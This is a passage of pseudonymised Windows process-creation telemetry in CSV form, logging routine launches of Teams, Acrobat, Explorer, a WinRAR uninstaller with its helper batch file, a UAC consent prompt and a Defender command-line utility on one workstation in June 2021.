Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:28:31.114018500+00:00,2021-06-23 10:30:27.180194200+00:00,9a76fa1f-2bf5-4c61-b0d9-a7654a49d8a8,computerpii_0a470890c60768167990033d701e7bd881398861,167141,False,10.7740.19041.1052,False,11540474045174939,,11540474045174941,2021-06-23 10:28:30.180945300+00:00,14524,2021-06-23 10:28:30.180945300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,14524,2176,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+461,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:28:31.496821200+00:00,20852,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1616,9989964399761676948,14240854266640559840,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1712 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 10:28:30.471916800+00:00,14792,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_OGQxYjYyM2MtMGRhNi00ODk0LTg4NzctY2VjOTJiODI1YTlj%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:28:31.770990300+00:00,2021-06-23 10:30:27.180349700+00:00,85b1fcef-4803-4082-a187-df45432fad74,computerpii_0a470890c60768167990033d701e7bd881398861,167144,False,10.7740.19041.1052,False,11540474045174940,,11540474045174942,2021-06-23 10:28:30.471916800+00:00,14792,2021-06-23 10:28:30.471916800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,14792,18560,TerminateProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+462,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:06:49.082936600+00:00,10460,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11252 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:06:49.109070400+00:00,2021-06-23 10:09:02.538780300+00:00,fb2dbeab-e8be-4646-91a4-5faacf99a892,computerpii_0a470890c60768167990033d701e7bd881398861,166940,False,10.7740.19041.1052,False,11540474045171817,,11540474045174861,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+463,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:57:00.511244+00:00,17944,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Truecoin KYC\GEA collection\FilePII_d05442711788e4d179c9d1f2ab9661bd49e95cee.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:57:00.576042400+00:00,2021-06-23 01:57:18.337401900+00:00,267efb2e-d334-4328-8fc0-e0b85df21581,computerpii_0a470890c60768167990033d701e7bd881398861,159449,False,10.7740.19041.1052,False,11540474045171770,,11540474045172612,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,16512,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+464,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:48:11.925034+00:00,16860,explorer.exe,"explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding",PortableExecutable,2021-06-09 01:20:37.358875500+00:00,C:\Windows\explorer.exe,4891752,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:11.941188300+00:00,2021-06-23 06:50:13.726894300+00:00,ba57be14-6736-41a0-ae83-9f5d0fa0f258,computerpii_0a470890c60768167990033d701e7bd881398861,164238,False,10.7740.19041.1052,False,11540474045136908,,11540474045173931,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer
+465,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:48:12.594273+00:00,7300,dllhost.exe,DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B},PortableExecutable,2020-10-09 20:47:47.793457100+00:00,C:\Windows\SysWOW64\dllhost.exe,19256,6f3c9485f8f97ac04c8e43ef4463a68c,3ed69caab035258e008efbcf40db305891b40ba02ca2737e20defa7c2d4afaf7,497b8ce238db644b7e1a16b417dbb5bc052a2684,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:12.669481600+00:00,2021-06-23 06:50:13.726924200+00:00,624445fd-cbeb-4d10-a400-a0880778b97d,computerpii_0a470890c60768167990033d701e7bd881398861,164239,False,10.7740.19041.1052,False,11540474045136908,,11540474045173932,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+466,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:48:20.902797100+00:00,21312,consent.exe,consent.exe 3388 368 000001C1814DF810,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:21.120936800+00:00,2021-06-23 06:50:13.727299800+00:00,d04a7b65-1b72-4443-9033-747a50e52096,computerpii_0a470890c60768167990033d701e7bd881398861,164252,False,10.7740.19041.1052,False,11540474045137067,,11540474045173934,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
+467,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 06:48:23.940375400+00:00,13756,Uninstall.exe,"""uninstall.exe"" ",PortableExecutable,2021-06-23 03:05:38.646367600+00:00,C:\Program Files\WinRAR\Uninstall.exe,412312,801d45c1ba40d3f49870e4d9bd319869,a99ed97a67233e0677468b0ea076e3c8182299e75c09cebf83e2564415483c76,5594c3f86e81f44ed1abc0389fb3c9e686c85336,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 06:48:23.802613300+00:00,13896,dllhost.exe,DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9},True,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:24.219963400+00:00,2021-06-23 06:50:13.727387400+00:00,4e9cb363-1701-4856-b08c-f34d4674a75b,computerpii_0a470890c60768167990033d701e7bd881398861,164255,False,10.7740.19041.1052,False,11540474045173936,,11540474045173937,2021-06-23 06:48:23.802613300+00:00,13896,2021-06-23 06:48:23.802613300+00:00,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,13896,128,ActiveProcessStartkey,C:\Windows\System32,21312,2098-11-02 01:44:16+00:00,2020-10-09 20:47:24.152425900+00:00,2021-06-23 06:48:23.804403300+00:00,2020-10-09 20:47:24.152425900+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate,Alexander Roshal,WinRAR,6.2.0,Uninstall WinRAR,Uninstall.exe,Uninstall WinRAR
+468,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 06:48:31.685693400+00:00,12424,cmd.exe,"cmd.exe /c ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f78ca60916c6adba9d4e21fd97ab26db56d07d3a.Bat""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,801d45c1ba40d3f49870e4d9bd319869,a99ed97a67233e0677468b0ea076e3c8182299e75c09cebf83e2564415483c76,5594c3f86e81f44ed1abc0389fb3c9e686c85336,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 06:48:23.940375400+00:00,13756,Uninstall.exe,"""uninstall.exe"" ",True,2021-06-23 06:48:23.802613300+00:00,13896,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:31.889826+00:00,2021-06-23 06:50:13.728409800+00:00,4be52268-15ce-4b1e-b0be-124a5188f6f9,computerpii_0a470890c60768167990033d701e7bd881398861,164294,False,10.7740.19041.1052,False,11540474045173937,,11540474045173940,2021-06-23 06:48:23.940375400+00:00,13756,2021-06-23 06:48:23.940375400+00:00,\Device\HarddiskVolume3\Program Files\WinRAR\Uninstall.exe,13756,128,TerminateProcessStartkey,C:\Program Files\WinRAR,412312,2021-06-11 09:16:34+00:00,2021-06-14 06:56:40.831857600+00:00,2021-06-23 06:48:23.982526600+00:00,2021-06-23 03:05:38.646367600+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,0.0,0.0,1.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Alexander Roshal,WinRAR,6.2.0,Uninstall WinRAR,Uninstall.exe,Uninstall WinRAR,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+469,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 06:48:31.884465400+00:00,5696,Uninstall.exe,"""uninstall.exe""  /wait",PortableExecutable,2021-06-23 03:05:38.646367600+00:00,C:\Program Files\WinRAR\Uninstall.exe,412312,801d45c1ba40d3f49870e4d9bd319869,a99ed97a67233e0677468b0ea076e3c8182299e75c09cebf83e2564415483c76,5594c3f86e81f44ed1abc0389fb3c9e686c85336,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 06:48:31.685693400+00:00,12424,cmd.exe,"cmd.exe /c ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f78ca60916c6adba9d4e21fd97ab26db56d07d3a.Bat""",True,2021-06-23 06:48:23.940375400+00:00,13756,\Device\HarddiskVolume3\Program Files\WinRAR\Uninstall.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:48:31.895245600+00:00,2021-06-23 06:50:13.728438400+00:00,77de1a1b-bb1f-43da-9edf-3f4259d31af1,computerpii_0a470890c60768167990033d701e7bd881398861,164295,False,10.7740.19041.1052,False,11540474045173940,,11540474045173942,2021-06-23 06:48:31.685693400+00:00,12424,2021-06-23 06:48:31.685693400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12424,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Alexander Roshal,WinRAR,6.2.0,Uninstall WinRAR,Uninstall.exe,Uninstall WinRAR
+470,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:56:19.970220300+00:00,7288,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0E6B7F70-53C4-2344-8CC6-37871D1E6AC4 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:56:20.479126600+00:00,2021-06-23 03:58:07.785508500+00:00,ac3f3e97-0942-4d37-a78a-e6da5c51023a,computerpii_0a470890c60768167990033d701e7bd881398861,162254,False,10.7740.19041.1052,False,11540474045145394,,11540474045173288,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows 